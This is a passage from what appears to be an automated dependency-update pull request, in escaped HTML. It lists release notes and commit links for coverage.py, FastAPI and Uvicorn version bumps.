\u003ccode\u003elazy\u003c/code\u003e is now bolded in HTML reports.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eWe are no longer testing eventlet support. Eventlet started issuing stern\ndeprecation warnings that break our tests. Our support code is still there.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _issue 1781: \u003ca href=\"https://redirect.github.com/coveragepy/coveragepy/issues/1781\"\u003ecoveragepy/coveragepy#1781\u003c/a\u003e\n.. _issue 2157: \u003ca href=\"https://redirect.github.com/coveragepy/coveragepy/issues/2157\"\u003ecoveragepy/coveragepy#2157\u003c/a\u003e\n.. _pull 2162: \u003ca href=\"https://redirect.github.com/coveragepy/coveragepy/pull/2162\"\u003ecoveragepy/coveragepy#2162\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/64d9b66fd852c1920ffe6cb8b58d7e4fdae90226\"\u003e\u003ccode\u003e64d9b66\u003c/code\u003e\u003c/a\u003e docs: correct the date for 7.14.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/6fa7dd44c25e1a660252faaf030dd8f2f1e20861\"\u003e\u003ccode\u003e6fa7dd4\u003c/code\u003e\u003c/a\u003e chore: bump actions/dependency-review-action (\u003ca href=\"https://redirect.github.com/coveragepy/coveragepy/issues/2181\"\u003e#2181\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/078afae263597b004eb9a85d880b6a65008e75ed\"\u003e\u003ccode\u003e078afae\u003c/code\u003e\u003c/a\u003e docs: sample HTML for 7.14.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/cb4f028a36e008b664739d04f387b90ee5105044\"\u003e\u003ccode\u003ecb4f028\u003c/code\u003e\u003c/a\u003e docs: prep for 7.14.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/ae2d09f562271c6169534e1c242d015dd0823dda\"\u003e\u003ccode\u003eae2d09f\u003c/code\u003e\u003c/a\u003e Merge branch 'nedbat/classifire-316-kits'\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/2c3568b2e041f2c0dbbc8eaa3919d46ee891b743\"\u003e\u003ccode\u003e2c3568b\u003c/code\u003e\u003c/a\u003e build: declare 3.16 compatibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/faa68f8601cf098701b68976dbb73b9fc23c9297\"\u003e\u003ccode\u003efaa68f8\u003c/code\u003e\u003c/a\u003e chore: bump github/codeql-action in the action-dependencies group (\u003ca href=\"https://redirect.github.com/coveragepy/coveragepy/issues/2173\"\u003e#2173\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/eb55feedf54b363e3d0b678f20abf3bfd3551a88\"\u003e\u003ccode\u003eeb55fee\u003c/code\u003e\u003c/a\u003e test: we don't need PyPy \u0026lt; 7.3.22 anymore\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/ac168fe53c04cdb2ff5231c0c4e5045021ee339b\"\u003e\u003ccode\u003eac168fe\u003c/code\u003e\u003c/a\u003e test: the text summary should show missing\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/fed4bd2db3c1cb2916a07791041da693fbf8e996\"\u003e\u003ccode\u003efed4bd2\u003c/code\u003e\u003c/a\u003e chore: upgrade virtualenv\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/coveragepy/coveragepy/compare/7.13.5...7.14.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `fastapi` from 0.135.3 to 0.136.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fastapi/fastapi/releases\"\u003efastapi's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.136.3\u003c/h2\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Do not accept underscore headers when using \u003ccode\u003econvert_underscores=True\u003c/code\u003e (the default). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15589\"\u003e#15589\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.136.2\u003c/h2\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Validate Server Sent Event fields to avoid applications from sending broken data. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15588\"\u003e#15588\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e📝 Document \u003ccode\u003e--entrypoint\u003c/code\u003e CLI option. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15464\"\u003e#15464\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update and simplify docs about help and management. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15583\"\u003e#15583\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Add docs references to central contributing docs. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15580\"\u003e#15580\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update security policy. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15577\"\u003e#15577\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🍱 Update sponsors: TalorData image. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15562\"\u003e#15562\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update docs, simplify usage of admonitions, only default ones. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15553\"\u003e#15553\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Fix image URLs in \u003ccode\u003eindex.md\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15534\"\u003e#15534\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e✏️ Fix Azkaban spelling typo in \u003ccode\u003evirtual-environments.md‎\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15463\"\u003e#15463\u003c/a\u003e by \u003ca href=\"https://github.com/isaacbernat\"\u003e\u003ccode\u003e@​isaacbernat\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e💄 Improve layout and styling. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15462\"\u003e#15462\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e💄 Refactor opinions section with interactive tabs and new logos. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15458\"\u003e#15458\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Add FastAPI Conf '26 announcement to docs. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15457\"\u003e#15457\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eTranslations\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e🌐 Improve translation consistency in \u003ccode\u003e‎docs/pt/docs/advanced/generate-clients.md‎\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15456\"\u003e#15456\u003c/a\u003e by \u003ca href=\"https://github.com/Will-thom\"\u003e\u003ccode\u003e@​Will-thom\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ja (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15530\"\u003e#15530\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for uk (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15529\"\u003e#15529\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for pt (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15528\"\u003e#15528\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for de (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15527\"\u003e#15527\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for tr (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15526\"\u003e#15526\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ko (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15525\"\u003e#15525\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for zh-hant (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15524\"\u003e#15524\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for fr (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15522\"\u003e#15522\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for es (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15523\"\u003e#15523\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for zh (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15520\"\u003e#15520\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ru (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15521\"\u003e#15521\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Fix typos in Spanish LLM-prompt. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15472\"\u003e#15472\u003c/a\u003e by \u003ca href=\"https://github.com/crr004\"\u003e\u003ccode\u003e@​crr004\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternal\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e✅ Update tests, don't double dispose the engine. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15587\"\u003e#15587\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⚡️ Speed up test suite via caching and fixture scopes to make it ~24% faster. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/13583\"\u003e#13583\u003c/a\u003e by \u003ca href=\"https://github.com/dikos1337\"\u003e\u003ccode\u003e@​dikos1337\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔥 Remove config files now in central GitHub repo. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15585\"\u003e#15585\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump urllib3 from 2.6.3 to 2.7.0. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15502\"\u003e#15502\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump idna from 3.11 to 3.15. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15565\"\u003e#15565\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump cloudflare/wrangler-action from 3.15.0 to 4.0.0. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15571\"\u003e#15571\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔧 Migrate docs from MkDocs to Zensical. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15563\"\u003e#15563\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔒️ Only allow team members to modify dependencies. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15548\"\u003e#15548\u003c/a\u003e by \u003ca href=\"https://github.com/svlandeg\"\u003e\u003ccode\u003e@​svlandeg\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/82064857539e6286522c347b4b11331b48dd2378\"\u003e\u003ccode\u003e8206485\u003c/code\u003e\u003c/a\u003e 🔖 Release version 0.136.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/c910e0139f983d0e04e2d1d235cd71803afeae34\"\u003e\u003ccode\u003ec910e01\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/063b5bf582d31fb155cc6bc6f88cf512329d0fd5\"\u003e\u003ccode\u003e063b5bf\u003c/code\u003e\u003c/a\u003e ♻️ Do not accept underscore headers when using \u003ccode\u003econvert_underscores=True\u003c/code\u003e (th...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/22b02e26f9e8c7e32bd8266e2b0ebe8bb3a0db2b\"\u003e\u003ccode\u003e22b02e2\u003c/code\u003e\u003c/a\u003e 🔖 Release version 0.136.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/3b252a2a22ba27a8ab83d6bde7d9cddbc5bf738e\"\u003e\u003ccode\u003e3b252a2\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/c7fb7851b3389f24c51701d705458989be53ccbb\"\u003e\u003ccode\u003ec7fb785\u003c/code\u003e\u003c/a\u003e ♻️ Validate Server Sent Event fields to avoid applications from sending broke...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/cb83b83dcf78eab4ea17d504db5abcda705fbdc4\"\u003e\u003ccode\u003ecb83b83\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/00f805cec94c0bf48c1f9a563535a3ab2e6f90ab\"\u003e\u003ccode\u003e00f805c\u003c/code\u003e\u003c/a\u003e ✅ Update tests, don't double dispose the engine (\u003ca href=\"https://redirect.github.com/fastapi/fastapi/issues/15587\"\u003e#15587\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/3675137523dc167981aa3a3c44599b4f3079ccd8\"\u003e\u003ccode\u003e3675137\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/7b57e42986bb4d40c9eb6580537d13fb8e76097e\"\u003e\u003ccode\u003e7b57e42\u003c/code\u003e\u003c/a\u003e 📝 Document \u003ccode\u003e--entrypoint\u003c/code\u003e CLI option (\u003ca href=\"https://redirect.github.com/fastapi/fastapi/issues/15464\"\u003e#15464\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/fastapi/fastapi/compare/0.135.3...0.136.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `uvicorn` from 0.44.0 to 0.49.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Kludex/uvicorn/releases\"\u003euvicorn's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 0.49.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBump httptools minimum version to 0.8.0 by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2962\"\u003eKludex/uvicorn#2962\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eConsume duplicate forwarding headers in ProxyHeadersMiddleware (reverses the 0.48.0 behavior of ignoring them) by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2971\"\u003eKludex/uvicorn#2971\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.48.0...0.49.0\"\u003ehttps://github.com/Kludex/uvicorn/compare/0.48.0...0.49.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.48.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDefault \u003ccode\u003essl_ciphers\u003c/code\u003e to \u003ccode\u003eNone\u003c/code\u003e and use OpenSSL defaults by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2940\"\u003eKludex/uvicorn#2940\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eIgnore duplicate forwarding headers in \u003ccode\u003eProxyHeadersMiddleware\u003c/code\u003e by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2944\"\u003eKludex/uvicorn#2944\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.47.0...0.48.0\"\u003ehttps://github.com/Kludex/uvicorn/compare/0.47.0...0.48.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.47.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEagerly import the ASGI app in the parent process by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2919\"\u003eKludex/uvicorn#2919\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003essl_context_factory\u003c/code\u003e for custom \u003ccode\u003eSSLContext\u003c/code\u003e configuration by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2920\"\u003eKludex/uvicorn#2920\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTreat \u003ccode\u003efd=0\u003c/code\u003e as a valid file descriptor with reload/workers by \u003ca href=\"https://github.com/eltoder\"\u003e\u003ccode\u003e@​eltoder\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2927\"\u003eKludex/uvicorn#2927\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.46.0...0.47.0\"\u003ehttps://github.com/Kludex/uvicorn/compare/0.46.0...0.47.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.46.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSupport \u003ccode\u003ews_max_size\u003c/code\u003e in \u003ccode\u003ewsproto\u003c/code\u003e implementation by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2915\"\u003eKludex/uvicorn#2915\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003ews_ping_interval\u003c/code\u003e and \u003ccode\u003ews_ping_timeout\u003c/code\u003e in \u003ccode\u003ewsproto\u003c/code\u003e implementation by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2916\"\u003eKludex/uvicorn#2916\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse \u003ccode\u003ebytearray\u003c/code\u003e for incoming WebSocket message buffer in websockets-sansio by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2917\"\u003eKludex/uvicorn#2917\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.45.0...0.46.0\"\u003ehttps://github.com/Kludex/uvicorn/compare/0.45.0...0.46.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.45.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ePreserve forwarded client ports in proxy headers middleware by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2903\"\u003eKludex/uvicorn#2903\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAccept \u003ccode\u003eos.PathLike\u003c/code\u003e for \u003ccode\u003elog_config\u003c/code\u003e by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2905\"\u003eKludex/uvicorn#2905\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAccept \u003ccode\u003elog_level\u003c/code\u003e strings case-insensitively by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2907\"\u003eKludex/uvicorn#2907\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRaise helpful \u003ccode\u003eImportError\u003c/code\u003e when PyYAML is missing for YAML log config by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2906\"\u003eKludex/uvicorn#2906\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevert empty context for ASGI runs by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2911\"\u003eKludex/uvicorn#2911\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003e--reset-contextvars\u003c/code\u003e flag to isolate ASGI request context by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2912\"\u003eKludex/uvicorn#2912\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevert \u0026quot;Emit \u003ccode\u003ehttp.disconnect\u003c/code\u003e on server shutdown for streaming responses\u0026quot; (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2829\"\u003e#2829\u003c/a\u003e) by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2913\"\u003eKludex/uvicorn#2913\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Krishnachaitanyakc\"\u003e\u003ccode\u003e@​Krishnachaitanyakc\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2870\"\u003eKludex/uvicorn#2870\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.44.0...0.45.0\"\u003ehttps://github.com/Kludex/uvicorn/compare/0.44.0...0.45.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Kludex/uvicorn/blob/main/docs/release-notes.md\"\u003euvicorn's 